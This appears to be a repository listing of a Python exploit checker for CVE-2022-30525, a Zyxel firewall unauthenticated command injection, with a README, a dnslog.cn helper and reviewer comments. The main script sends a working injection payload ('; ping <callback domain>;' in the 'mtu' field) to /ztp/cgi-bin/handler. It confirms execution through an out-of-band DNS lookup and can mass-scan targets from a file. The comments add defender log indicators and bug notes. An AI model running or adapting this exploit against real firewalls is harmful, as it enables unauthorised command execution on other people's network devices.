├── ip.txt
├── dnslog.py
├── README.md
└── CVE-2022-30525.py


/ip.txt:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/dnslog.py:
--------------------------------------------------------------------------------
import random
import requests

# One session object shared by both helpers below.
# NOTE(review): presumably dnslog.cn ties the issued domain to this session's
# cookie, which would be why the same session is reused - confirm; nothing in
# this file shows it.
res = requests.session()


def get_dnslog():
    """Request a callback domain from dnslog.cn and return the response body.

    Returns the response text when the HTTP status is 200 and the body
    contains the substring "dnslog". Otherwise prints a failure message and
    falls through, so the caller receives None.
    """
    # Random float sent as the `t` query parameter (presumably a cache-buster).
    t = random.random()
    # NOTE(review): plain HTTP to a third-party service and no timeout on the
    # request; a stalled response blocks the whole run.
    url = f"http://www.dnslog.cn/getdomain.php?t={t}"
    res1 = res.get(url=url)
    if res1.status_code == 200 and "dnslog" in res1.text:
        dnslog = res1.text
        return dnslog
    else:
        # Message reads "failed to obtain dnslog". No value is returned on this
        # path; the caller in CVE-2022-30525.py does not check for None.
        print("获取dnslog失败")


def get_data():
    """Fetch the lookup records from dnslog.cn and return the raw response text.

    The status code is not checked; whatever body comes back is returned.
    """
    t = random.random()
    # NOTE(review): same plain-HTTP, no-timeout request pattern as get_dnslog().
    url = f"http://www.dnslog.cn/getrecords.php?t={t}"
    res2 = res.get(url=url)
    return res2.text



--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2022-30525
Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)


# Optional Arguments:

-h, --help show this help message and exit

-u url, --url url Target url eg:"http://127.0.0.1"

-f file, --file file Targets in file eg:"ip.txt"

# Use

python3 CVE-2022-30525.py -u http://127.0.0.1

python3 CVE-2022-30525.py -f ip.txt

# Link
https://www.henry4e36.top/index.php/archives/42.html


# 参考
https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

--------------------------------------------------------------------------------
/CVE-2022-30525.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- conding:utf-8 -*-
# NOTE(review): "conding" is a typo, so the line above is not an encoding
# declaration; Python 3 reads source files as UTF-8 by default.
import requests
import argparse
import sys
import urllib3
import json
import time
from dnslog import get_dnslog,get_data
# Silences urllib3 warnings process-wide, including the one raised for the
# unverified HTTPS request made with verify=False in target_url().
urllib3.disable_warnings()


def title():
    """Print the ASCII-art banner and the author line."""
    # NOTE(review): runs of spaces in the banner were collapsed in this
    # listing; it is reproduced as shown, not as originally aligned.
    # The string is not raw, so the backslashes before spaces, "/" and "_" are
    # invalid escape sequences that recent Python versions warn about.
    print("""
    _____ __ __ ______ ___ ___ ___ ___ ____ ___ _____ ___ _____
    / ____|\ \ / /| ____| |__ \ / _ \ |__ \ |__ \ |___ \ / _ \ | ____||__ \ | ____|
    | | \ \ / / | |__ ______ ) || | | | ) | ) | ______ __) || | | || |__ ) || |__
    | | \ \/ / | __| |______| / / | | | | / / / / |______| |__ < | | | ||___ \ / / |___ \
    | |____ \ / | |____ / /_ | |_| | / /_ / /_ ___) || |_| | ___) | / /_ ___) |
    \_____| \/ |______| |____| \___/ |____||____| |____/ \___/ |____/ |____||____/


    Author:Henry4E36
    """)

class information(object):
    """Holds the parsed command-line arguments and runs the check per target."""

    def __init__(self,args):
        """Store the argparse namespace and its `url` and `file` values."""
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self):
        """Run the check against self.url and print the verdict.

        Sends one JSON POST to <self.url>/ztp/cgi-bin/handler, waits five
        seconds, then fetches the dnslog.cn records and reports the target as
        affected when the callback domain appears in them.
        """
        # This is an active check, not a version or banner comparison: the
        # `mtu` field below carries a shell-separated `ping` of the callback
        # domain, and the verdict depends on that lookup being recorded.
        target_url = self.url + "/ztp/cgi-bin/handler"
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
            "Content-Type": "application/json"
        }
        # NOTE(review): get_dnslog() returns None on failure. The payload then
        # contains the text "None" and `dnslog in data` below raises TypeError.
        dnslog = get_dnslog()
        # For defenders: a POST to /ztp/cgi-bin/handler with
        # "command": "setWanPortSt" and ";" inside "mtu" is the request shape
        # to match in web or proxy logs. The fixed User-Agent above is a weaker
        # indicator because it is trivially changed.
        data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
        try:
            # verify=False turns off TLS certificate validation for the target.
            res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, timeout=5)
        except Exception as e:
            # NOTE(review): every request error is swallowed (`res` and `e` are
            # never used), so an unreachable or timed-out host still reaches
            # the polling step and is printed as "not affected".
            pass

        # Fixed five-second wait before polling; a later lookup is missed.
        time.sleep(5)
        # `data` is rebound here from the request payload to the records text.
        data = get_data()
        # The verdict rests only on the callback domain appearing in records
        # held by dnslog.cn, a third party that therefore sees which targets
        # triggered a lookup.
        if dnslog in data:
            # \033[31m ... \033[0m is red ANSI colouring; chr(8730) is the
            # check mark. Message: "target system <url> has the Zyxel firewall
            # unauthenticated remote command injection".
            print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
            print("[" + "-"*100 + "]")
        else:
            # Message: "target system <url> does not have the ... injection".
            print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!")
            print("[" + "-"*100 + "]")

    def file_url(self):
        """Read targets from self.file, one per line, and check each in turn."""
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                # Any entry not starting with "http" gets an "http://" prefix.
                # NOTE(review): a blank line becomes the target "http://"; the
                # ip.txt shipped in this listing holds only blank lines.
                if url[:4] != "http":
                    url = "http://" + url
                self.url = url.strip()
                # Called through the class with self passed explicitly; same
                # effect as self.target_url() for this class.
                information.target_url(self)


if __name__ == "__main__":
    title()
    # `ar` is a second name bound to the same parser and is not used again.
    parser = ar=argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
    args = parser.parse_args()
    # Requires exactly one option and its value as two separate words, so
    # `--url=...` and passing both -u and -f take the usage-error branch.
    # Message: "argument error!" followed by two usage examples.
    if len(sys.argv) != 3:
        print(
            "[-] 参数错误!\neg1:>>>python3 CVE-2022-30525.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-30525.py -f ip.txt")
    elif args.url:
        information(args).target_url()

    elif args.file:
        information(args).file_url()

--------------------------------------------------------------------------------